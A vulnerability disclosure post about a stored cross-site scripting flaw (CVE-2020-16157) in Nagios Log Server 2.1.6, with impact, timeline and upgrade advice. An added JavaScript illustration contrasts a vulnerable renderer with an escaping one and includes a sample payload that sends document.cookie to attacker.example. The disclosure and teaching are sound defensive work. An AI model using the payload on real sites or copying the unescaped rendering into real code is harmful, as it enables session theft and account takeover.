Stored XSS Vulnerability found in Nagios Log Server

On testing the popular log monitoring and management application, Nagios Log Server version 2.1.6 (latest at the time of testing), I found that it is vulnerable to Stored XSS attacks.

CVE-2020-16157

Summary

Nagios Log Server is a popular Centralized Log Management, Monitoring, and Analysis software that allows organizations to view, sort, and configure logs. Version 2.1.6 of the application was found to be vulnerable to Stored XSS.

In a Stored Cross-Site Scripting attack, the attacker injects a script (the payload) that is permanently stored (persisted) by the target application, for instance in its database, and then served to other users whenever the affected page is rendered. A classic example is a malicious script inserted by an attacker into a comment field on a blog or into a forum post.

Impact

An attacker (in this case, an authenticated regular user) can use this high-severity vulnerability to execute malicious JavaScript in the browser of any user who views the affected page. Such a script can steal cookies, redirect users, perform arbitrary actions on the victim's (in this case, an admin's) behalf, log their keystrokes, and more.

The attacker does not need to find an external way of inducing other users to make a particular request containing their exploit. Rather, the attacker places their exploit into the application itself and simply waits for the victim to encounter it.
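The page withholds the specific injection point in Nagios Log Server until the disclosure date, so the following is a generic, added illustration of the pattern described above and is not code from the original post or from Nagios. It models a low-privileged user persisting a payload that is later rendered into an admin-facing page: a vulnerable renderer that interpolates stored text as raw HTML sits beside a hardened one that output-encodes it. The in-memory `store`, the comment data, the `attacker.example` host and the `containsScriptTag` heuristic are all constructed for the example.

```javascript
// Added example (not Nagios code): a minimal stored-XSS model.
// A "comment" submitted by a low-privileged user is persisted, then later
// rendered into an admin-facing page. If the renderer interpolates raw
// HTML, the attacker's script runs in the admin's browser on every view.

const store = []; // stand-in for the application's database (constructed)

// Attacker step: persist the payload. Nothing runs yet; it just sits in storage
// waiting for a victim to load the page that renders it.
function submitComment(author, body) {
  store.push({ author, body });
  return store.length - 1;
}

// Vulnerable renderer: string interpolation with no output encoding.
function renderVulnerable() {
  return store
    .map(c => `<li><b>${c.author}</b>: ${c.body}</li>`)
    .join("\n");
}

// Hardened renderer: encode the five characters that matter in HTML text
// and attribute contexts before interpolating user-controlled data.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  }[ch]));
}

function renderSafe() {
  return store
    .map(c => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join("\n");
}

// Crude check a tester can run over a rendered page: did the payload survive
// as live markup? (Constructed heuristic, not a full HTML parser.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample data: one benign comment and one carrying a classic
// cookie-exfiltration payload. attacker.example is an assumed placeholder.
submitComment("alice", "Disk usage alert cleared at 03:14");
submitComment("mallory",
  '<script>new Image().src="https://attacker.example/c?"+encodeURIComponent(document.cookie)</script>');

const vulnerable = renderVulnerable();
const safe = renderSafe();
console.log("vulnerable page carries live payload:", containsScriptTag(vulnerable)); // true
console.log("hardened page carries live payload:", containsScriptTag(safe));         // false
```

The escaping shown is only correct for HTML body and quoted-attribute contexts; data that lands inside a `<script>` block, an event-handler attribute or a URL needs a different encoder, and an `HttpOnly` cookie flag limits the cookie-theft variant of the payload but not the "perform actions as the admin" variant.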

Vulnerability

More details on the vulnerability will be added on August 15, 2020, giving users the time to update to the latest version.

Timeline

  • Vulnerability reported to the Nagios team – July 08, 2020
  • Nagios Log Server 2.1.7 containing the fix to the vulnerability released – July 28, 2020

Recommendation

It is highly recommended to update Nagios Log Server to version 2.1.7 or later, which contains the fix for this vulnerability.

Special Note

I highly appreciate the Nagios team's quick back-and-forth communication regarding the vulnerability report and the timely update fixing the issue.

Written by
Jinson Varghese